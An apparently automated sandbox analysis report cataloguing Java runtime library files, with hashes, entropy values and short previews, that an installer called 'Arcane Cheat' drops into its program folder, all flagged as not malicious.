                                Preview:PK........u..H................META-INF/....PK........u..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....E...E...+...com/sun/net/ssl/internal/ssl/Provider.class.......4...............................serialVersionUID...J...ConstantValue.,..c".J-...<init>...()V...Code...LineNumberTable...(Ljava/security/Provider;)V...(Ljava/lang/String;)V...isFIPS...()Z...install...SourceFile...Provider.java......................%com/sun/net/ssl/internal/ssl/Provider...sun/security/ssl/SunJSSE.1.......................................!........*...................)...*............."........*+......................./............."........*+...................3...4.)........................

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-6S6GT.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1249
                                Entropy (8bit):4.735634480139973
                                Encrypted:false
                                SSDEEP:12:AJx/wzjJQO1YfK4pPq8Ul6GyGLCKDJ9w5lAu9aEVjEcGuc8X3A0LlmPOiMA0L9UV:w/61sppNUl6GbLCOMlmEOucA3e2s/WW
                                MD5:BB63293B1207CB8608C5FBE089A1B06D
                                SHA1:96A0FA723AF939C22AE25B164771319D82BC033B
                                SHA-256:633015AD63728DFE7A51BF26E55B766DD3E935F1FCCCFFA8054BF6E158EA89B2
                                SHA-512:0042DEBE4A77DA997A75A294A0C48D19AED258EEB3CD723FD305037DF11F0A5073A92CC54967B8B541E1AFC912F36481D0B0F68477B8156E52E15093722B7C32
                                Malicious:false
                                Preview:############################################################..# Sound Configuration File..############################################################..#..# This properties file is used to specify default service..# providers for javax.sound.midi.MidiSystem and..# javax.sound.sampled.AudioSystem...#..# The following keys are recognized by MidiSystem methods:..#..# javax.sound.midi.Receiver..# javax.sound.midi.Sequencer..# javax.sound.midi.Synthesizer..# javax.sound.midi.Transmitter..#..# The following keys are recognized by AudioSystem methods:..#..# javax.sound.sampled.Clip..# javax.sound.sampled.Port..# javax.sound.sampled.SourceDataLine..# javax.sound.sampled.TargetDataLine..#..# The values specify the full class name of the service..# provider, or the device name...#..# See the class descriptions for details...#..# Example 1:..# Use MyDeviceProvider as default for SourceDataLines:..# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider..#..# Example 2:..# Speci

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-71S1B.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1438
                                Entropy (8bit):5.214662998532387
                                Encrypted:false
                                SSDEEP:24:QVDpdQYHLOVhl86bePCkHUMCLC9TFcgg+DR+Oby:MQ4LOVh2WGfUMCLC9Zcgg2Ru
                                MD5:92BA2D87915E6F7F58D43344DF07E1A6
                                SHA1:872BC54E53377AAC7C7616196BCCE1DB6A3F0477
                                SHA-256:68F0CF30429A42A6FE78B1DE91970E5C78FD03D1599BEB080C1C196D5C59E4C0
                                SHA-512:A964E2CEB4D601FAF28ECF13FB11777B70708C21CF9EA23721E462B6E911051108B8A42EBF6447FA49CB61D7FA2D79475F50EE791F1121616371E2B02FAB71B6
                                Malicious:false
                                Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..# Japanese imperial calendar..#..# Meiji since 1868-01-01 00:00:00 local time (Gregorian)..# Taisho since 1912-07-30 00:00:00 local time (Gregorian)..# Showa since 1926-12-25 00:00:00 local time (Gregorian)..# Heisei since 1989-01-08 00:00:00 local time (Gregorian)..calendar.japanese.type: LocalGregorianCalendar..calendar.japanese.eras: \...name=Meiji,abbr=M,since=-3218832000000; \...name=Taisho,abbr=T,since=-1812153600000; \...name=Showa,abbr=S,since=-1357603200000; \...name=Heisei,abbr=H,since=600220800000....#..# Taiwanese calendar..# Minguo since 1911-01-01 00:00:00 local time (Gregorian)..calendar.taiwanese.type: LocalGregorianCalendar..calendar.taiwanese.eras: \...name=MinGuo,since=-1830384000000....#..# Thai Buddhist calendar..# Buddhist Era since -5

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-7LOEQ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):1012097
                                Entropy (8bit):7.896417877823185
                                Encrypted:false
                                SSDEEP:24576:q7jNpf26MPAMSL/wxSz2ijt2eejo+oV3vv:6NVZEaL4xSljt2eHNV3
                                MD5:54EF6C22FAAAE5850091031763078D37
                                SHA1:11D40B78BB606E245CB5E17C6DDB08193A34B40E
                                SHA-256:654B033B1DC315EB9806F0D35ABAF3F25064AC806292ACB2BD818F6B2DF2AD07
                                SHA-512:10998B6508D5571E1ECE2001C6E561169D3DBD7580A3DE439067D1195FBE85E6BD1729A0874E306234391AF963E1B062050276E1AC0E9C9FA289711738B41B31
                                Malicious:false
                                Preview:PK........!..H................META-INF/....PK........ ..H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/uitoolkit/PK...........H................com/sun/deploy/uitoolkit/impl/PK........!..H............"...com/sun/deploy/uitoolkit/impl/awt/PK...........H............#...com/sun/deploy/uitoolkit/impl/text/PK...........H................com/sun/deploy/uitoolkit/ui/PK...........H................com/sun/java/PK...........H................com/sun/java/browser/PK...........H................com/sun/java/browser/plugin2/PK...........H............)...com/sun/java/browser/plugin2/liveconnect/PK...........H............,...com/sun/java/browser/plugin2/liveconnect/v1/PK...........H................netscape/PK...........H................netscape/javascript/PK.........

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-8LK0S.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):560553
                                Entropy (8bit):5.781566946934384
                                Encrypted:false
                                SSDEEP:12288:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cD:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f3
                                MD5:CCB395235C35C3ACBA592B21138CC6AB
                                SHA1:29C463AA4780F13E77FB08CC151F68CA2B2958D5
                                SHA-256:27AD8EA5192EE2D91BA7A0EACE9843CB19F5E145259466158C2F48C971EB7B8F
                                SHA-512:D4C330741387F62DD6E52B41167CB11ABD8615675FE7E1C14AE05A52F87A348CBC64B56866AE313B2906B33CE98BE73681F769A4A54F6FE9A7D056F88CF9A4E1
                                Malicious:false
                                Preview:PK........t..H................META-INF/....PK........t..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........HB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean/

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-B8ALA.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2514
                                Entropy (8bit):4.525846572478507
                                Encrypted:false
                                SSDEEP:48:/GXieQT8cg6ZGBjn4stbaWUwO61xFMxO9:OXieW8nBjn4x613Mw9
                                MD5:0AA5D5EFDB4F2B92BEBBEB4160AA808B
                                SHA1:C6F1B311A4D0790AF8C16C1CA9599D043BA99E90
                                SHA-256:A3148336160EA7EF451052D1F435F7C9D96EEB738105AC730358EDADA5BD45A2
                                SHA-512:A52C2B784CF0B01A2AF3066F4BB8E7FD890A86CFD82359A22266341942A25333D4C63BA2C02AA43ADE872357FC9C8BBC60D311B2AF2AD2634D60377A2294AFDD
                                Malicious:false
                                Preview:############################################################..# .Default Logging Configuration File..#..# You can use a different file by specifying a filename..# with the java.util.logging.config.file system property. ..# For example java -Djava.util.logging.config.file=myfile..############################################################....############################################################..# .Global properties..############################################################....# "handlers" specifies a comma separated list of log Handler ..# classes. These handlers will be installed during VM startup...# Note that these classes must be on the system classpath...# By default we only configure a ConsoleHandler, which will only..# show messages at the INFO and above levels...handlers= java.util.logging.ConsoleHandler....# To also add the FileHandler, use the following line instead...#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler....# Default global

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-DB6C0.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):114950
                                Entropy (8bit):7.912507028584016
                                Encrypted:false
                                SSDEEP:1536:5sNJO+ylt6se6sgU0w/XzGYWuSy15DudYLSfaxwpt5g1naZEqwoJ8sYcF+z/VSG8:aj8GHXZSy1pudYLdQe1ATtKVS+ws9O
                                MD5:A39F61D6ED2585519D7AF1E2EA029F59
                                SHA1:52515AC6DEAB634F3495FD724DEA643EE442B8FD
                                SHA-256:60724D9E372FBE42759349A06D3426380CA2B9162FA01EB2C3587A58A34AD7E0
                                SHA-512:AC2E9AB749F5365BE0FB8EBD321E8F231D22EAE396053745F047FCBCCF8D3DE2F737D3C37A52C715ADDFBDBD18F14809E8B37B382B018B58A76E063EFBA96948
                                Malicious:false
                                Preview:PK........gwHG................META-INF/MANIFEST.MF.Y....Y.C,j.m.,....z..I &1.m....b........D..+.$t......]....h.o......x...~..?..<@....7#n3.......m../\..u..>.....#......~.K..A..x ..../J...xa..,.._...G...?^...{...>.uj.AQ?^h....c_.pc..W....c.A..`....-.~ak.....^.&.......l.......X.kG.~yg..f......Z..b..L|......4....`..}........mG.o.....kU..*;W.HCU....e.....V..,...1Y.z<.n.A.j.....P..S.($,z........uD".9;..q...k.:p3pW......O...(....\.B...2...#.,.;w.q..k0r.el\F.^.!p..$.....}.9..lhf.P..:.E.&Lf..5.7....W.A.....[7.N}..+.J!.9.Gl.... ...rL.B}.Q.,.'.....@...W.ry[Ok&.......o...dp%..2.\.[2.........fB.p..Xd._.lA....xw..`.r..8...o.....ad}-..;...6....e...F.&e\....'...fA.Db.......%.@..^..U...*..q<.Z.K.T...."r.b...7@8.)4..~.4b....Y.q..u..N..|...e.#.I....4c{.....g.R....]......F.fo.F.u.).F.Z]..(.c|s....u.i..8..=..N%....]...)Xj\..t..w..ql..n.....2..u...|x$7YL.M.?..]..W...m^].~...{....I..{......[-..].f....Sc..c..6..kN.>....7x.k..a7S......8..e.w....*......&.;.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-EJS52.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4312
                                Entropy (8bit):4.756104846669624
                                Encrypted:false
                                SSDEEP:96:6VprYJmprYJD9Y3t3qFKPG7hLxVJgdTsfbFfcwQoPv:6HrsursD9Y3t36KPG7HyoBQoX
                                MD5:AD91D69A4129D31D72FBE288FF967943
                                SHA1:CB510AFCDBECEA3538C3F841C0440194573DBB65
                                SHA-256:235A50D958FAEDDE808D071705A6D603F97611F568EEC40D7444984B984A4B18
                                SHA-512:600BEE4676D26E2CE5B9171582540021509A4D7888C9C7BADC14F0FAD07007E4CE2B4C007A8EB15BD0D977722B8B34442012EA972FFBD72797475A56CDFD86EE
                                Malicious:false
                                Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:.... - Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... - Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... - Neither the name of Oracle nor the names of its.. contributors may be used to endorse or promote products derived.. from this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS..IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR..PURP

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-GDBM4.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):58
                                Entropy (8bit):4.4779965120705425
                                Encrypted:false
                                SSDEEP:3:CEBqRM9LTAGQdLV6ETEBqRM9LHQIuHPy:CEAsnAbLlszQdy
                                MD5:3C2B9CCAAD3D986E5874E8C0F82C37CF
                                SHA1:D1DDA4A2D5D37249C8878437DBF36C6AE61C33D1
                                SHA-256:D5BCD7D43E383D33B904CFF6C80ACE359DBE2CE2796E51E9743358BD650E4198
                                SHA-512:4350CCA847D214479C6AE430EB71EE98A220EA10EC175D0AB317A8B43ABC9B4054E41D0FF383F26D593DE825F761FB93704E37292831900F31E5E38167A41BAB
                                Malicious:false
                                Preview:javafx.runtime.version=8.0.101..javafx.runtime.build=b13..

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-HMD89.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):2282861
                                Entropy (8bit):7.951223313727943
                                Encrypted:false
                                SSDEEP:49152:ABSxAmHHJwEu4l3Dyz7oQHeNHJJ2aAvfZc:ABEtHHaEuI3Dy3oQH2pFAvW
                                MD5:2388C4C8D5F95E0379A8997C7C2492F4
                                SHA1:906BF87EB1D8881ABADBF93A3C4BBA7887CA2A01
                                SHA-256:A1FD508EACF76645EB0885B243B5DD14239F1E039E8B53ED038226DF91A30539
                                SHA-512:2CCE11A5F97DF842964B55408FCF1EC84C0CD561E664ABA3A51275EAFE59D7C920FCFD954C527DA4D53ACB191200CC64BF8150A33BCB9B038F36ADB2CC69B1A1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/oracle/PK...........H................com/oracle/deploy/PK...........H................com/oracle/deploy/update/PK...........H................com/sun/PK...........H................com/sun/applet2/PK...........H................com/sun/applet2/preloader/PK...........H............ ...com/sun/applet2/preloader/event/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/appcontext/PK...........H................com/sun/deploy/association/PK...........H............#...com/sun/deploy/association/utility/PK...........H................com/sun/deploy/cache/PK...........H................com/sun/deploy/config/PK...........H................com/sun/deploy/jardiff/PK...........H................com/sun/deploy/model/PK.....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-IUF2L.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):10716
                                Entropy (8bit):5.016037435830914
                                Encrypted:false
                                SSDEEP:192:Jp22HdiEUEdWUcPeJ7fbdHmcbiLMWNDyZcy57ha1xh3qvfRdIdyJkW:u2HdiEUEdGY1gbD9TKdIdyJkW
                                MD5:66B3E6770C291FE8CD3240FFBB00DC47
                                SHA1:88CE9D723A2D4A07FD2032A8B4A742FE323EEC8F
                                SHA-256:7EA6E05D3B8B51D03C3D6548E709C220541DF0F1AEE2E69B9101C9F051F7C17A
                                SHA-512:D1B99AA011568AFFA415758C986B427588AE87FE5EB7FC52D519F7167AD46BBFF8B62799F14D8DBC7C55DEB6FF7259445D6E8882CC781D61206ED1B79B688745
                                Malicious:false
                                Preview:#..#..# Copyright (c) 1999, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..#.PostScript printer property file for Java 2D printing...#..# WARNING: This is an internal implementation file, not a public file...# Any customisation or reliance on the existence of this file and its..# contents or syntax is discouraged and unsupported...# It may be incompatibly changed or removed without any notice...#..#..font.num=35..#..# Legacy logical font family names and logical font aliases should all..# map to the primary logical font names...#..serif=serif..times=serif..timesroman=serif..sansserif=sansserif..helvetica=sansserif..dialog=sansserif..dialoginput=monospaced..monospaced=monospaced..courier=monospaced..#..# Next, physical fonts which can be safely mapped to standard postscript fonts..# These keys generally map to a value which is the same as the key, so

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-J0593.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):84355
                                Entropy (8bit):4.927199323446014
                                Encrypted:false
                                SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                MD5:7FC71A62D85CCF12996680A4080AA44E
                                SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                Malicious:false
                                Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-J5D5J.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):33932
                                Entropy (8bit):7.930702746433849
                                Encrypted:false
                                SSDEEP:768:xYJfTGikW6VajSe/SA5vN9kqizE48ojVxQYuW+t:xY5TpkK/nFNIzptjVxYHt
                                MD5:C401E00A5DE0DD9723885CEF9E2F5A44
                                SHA1:B6735B93811517F062A20869D8A0B57FAEFF6A90
                                SHA-256:C6574F4763696F2A83028DE143D9ED1C975062BA2D44CC5C91558751FB84BCD6
                                SHA-512:595B950AD5BFF930654BF7FB996BA222D19B4F175821AB0FD6EC4F54D4B7D62B37757429051D1302BC438AB76350B4CD0A07BA712CAECC79DCDB0C60494B5AB2
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.E..Z...g.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%-..x...R.KRSt.*A.-...M.t....4....sR......K..5y.x..PK...........H................javafx/PK...........H................javafx/embed/PK...........H................javafx/embed/swt/PK...........Hj...........%...javafx/embed/swt/CustomTransfer.class.T[S.F.=.MX(..!............8..`h.d....." yd..........4....%..k.N..ka.83..[.....|+...........#.OD..1...1.1.S1....*>..I..TL.....Y..*.S.q.-KAja..6.M.Y7V|.v...e............+...u...Z.....Z......k...O.v.....x..f...M.v...~I....j.N.(.R.... ..n.%).l:.N..,J...-.%.os:.v.K..V.._p.u.l..e...S5...^.....3+.Yy.h.RtGR..y.)..~...g..R.;5K...{.G.*..X.JP....D....8..[3.g...'d.e#Z.|c.j.t..F.w..t.W.j.,K[q.^..E.=M.a..6d.Z..yV.....=..........:.WG.............RA.<......qT...,*.=.....t\......(aI.2.....!..Jp.,..<.x..n.S....N.K.e.W....N.-..`....hmQ.E.fGE..$..n...4I{.......l_.)......?.Z>...t

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-JK5E2.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):476286
                                Entropy (8bit):7.905283162751186
                                Encrypted:false
                                SSDEEP:12288:k4VtaECp5plmgYhuWvHuR9Ta/+Aw7okxygk+W:kUChlHYHMaHw7XxW
                                MD5:5D8C1723F3005BD63DBA2B478CE15621
                                SHA1:AB26A6167789DCF81A0C40D121DC91005804C703
                                SHA-256:B637B78CFC33C92D4838D5FABFD0647CE03C3EF69D86EF6A7E6F229510AAF3B5
                                SHA-512:9830CCDFE913A492BB4E0015EE3E729BEA8EC1F22EDF48ED7CE2AEFD5376DF24F33948B9155E31EDFA9BC240544406FD2C43A34DD1366E4936B3318D3CA5ED1C
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/javaws/PK...........H................com/sun/javaws/exceptions/PK...........H................com/sun/javaws/jnl/PK...........H................com/sun/javaws/net/PK...........H................com/sun/javaws/net/protocol/PK...........H............ ...com/sun/javaws/net/protocol/jar/PK...........H................com/sun/javaws/progress/PK...........H................com/sun/javaws/security/PK...........H................com/sun/javaws/ui/PK...........H................com/sun/javaws/util/PK...........H................com/sun/jnlp/PK...........H................javax/PK...........H................javax/jnlp/PK...........H~p4=........#...com/sun/javaws/BrowserSupport.class.RMO.1.}...].H @.|.|(...P..B.....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-KUGIH.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):155
                                Entropy (8bit):4.618267268558291
                                Encrypted:false
                                SSDEEP:3:nSkoZgZLXnuWxVEsTwVAAiuKIn7IRAdSPGGzJ0vwQAnfMaAHCRyvy:nBcAPWEwVAkIiSPhwwpkaAHCIa
                                MD5:9E5E954BC0E625A69A0A430E80DCF724
                                SHA1:C29C1F37A2148B50A343DB1A4AA9EB0512F80749
                                SHA-256:A46372B05CE9F40F5D5A775C90D7AA60687CD91AAA7374C499F0221229BF344E
                                SHA-512:18A8277A872FB9E070A1980EEE3DDD096ED0BBA755DB9B57409983C1D5A860E9CBD3B67E66FF47852FE12324B84D4984E2F13859F65FABE2FF175725898F1B67
                                Malicious:false
                                Preview:#..# Load the Java Access Bridge class into the JVM..#..#assistive_technologies=com.sun.java.accessibility.AccessBridge..#screen_magnifier_present=true....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-LKM6J.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3091908
                                Entropy (8bit):6.633254981822853
                                Encrypted:false
                                SSDEEP:49152:puZi4j4TQkgaSOHEhjy2twRYEc1sJzlbguMuD:puZiW4smxGocuJlbgq
                                MD5:0B3923ABB0D48FDAE7A2306717967B39
                                SHA1:0882294FFEC2769023AA36FF9CC53562F8E26020
                                SHA-256:E88AEC2A49F07CAC9471D9E4C113FA189600B57245685814D043C20EA8A8B471
                                SHA-512:CF622081B290140CE8419B30FB25442F7204C9A37E1490030A4D656F66C509946F48C50CC7794DA51007EFB202805605FE3C2AC3534D63FBF928EA35CE16A040
                                Malicious:false
                                Preview:PK........s..H................META-INF/....PK........s..H<:S1D...D.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_07 (Oracle Corporation)....PK...........HUi..............sun/nio/cs/ext/Big5.class.......4."..........t....t............................................................................................................................................................................................................................................................................................................................................................................~.........b2cSBStr...Ljava/lang/String;...ConstantValue...b2cStr...[Ljava/lang/String;...b2c...[[C...b2cSB...[C...b2cInitialized...Z...c2b...c2bIndex...c2bInitialized...<init>...()V...Code...LineNumberTable...historicalName...()Ljava/lang/String;...contains...(Ljava/nio/charset/Charset;)Z...StackMapTable...newDecoder..#()Ljava/nio/charset/CharsetDecoder;...newEncoder..#()Ljava/nio/charset/Ch

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-LVB41.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):3490933
                                Entropy (8bit):6.067002853185717
                                Encrypted:false
                                SSDEEP:49152:WX4zfeUcKDQ1toKXiO3fLxqhH3YRazQwIK7XgnyRMvMtMm55HopLKbtJzUkMkOBV:GL
                                MD5:9A084B91667E7437574236CD27B7C688
                                SHA1:D8926CC4AA12D6FE9ABE64C8C3CB8BC0F594C5B1
                                SHA-256:A1366A75454FC0F1CA5A14EA03B4927BB8584D6D5B402DFA453122AE16DBF22D
                                SHA-512:D603AA29E1F6EEFFF4B15C7EBC8A0FA18E090D2E1147D56FD80581C7404EE1CB9D6972FCF2BD0CB24926B3AF4DFC5BE9BCE1FE018681F22A38ADAA278BF22D73
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/*;;..x-java-view=com.sun.activation.viewers.TextViewer.text/*;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK...........H..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\is-M00FU.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:data
                                Category:dropped
                                Size (bytes):103910
                                Entropy (8bit):7.113278604363908
                                Encrypted:false
                                SSDEEP:1536:OcQWmFKJzLl2g6kpE7tdTMBB/////t97Taz69rU4y/uqmol7s2gK:Oyh3F27/qGzkrfy/uqllQ2gK
                                MD5:5A7F416BD764E4A0C2DEB976B1D04B7B
                                SHA1:E12754541A58D7687DEDA517CDDA14B897FF4400
                                SHA-256:A636AFA5EDBA8AA0944836793537D9C5B5CA0091CCC3741FC0823EDAE8697C9D
                                SHA-512:3AB2AD86832B98F8E5E1CE1C1B3FFEFA3C3D00B592EB1858E4A10FFF88D1A74DA81AD24C7EC82615C398192F976A1C15358FCE9451AA0AF9E65FB566731D6D8F
                                Malicious:false
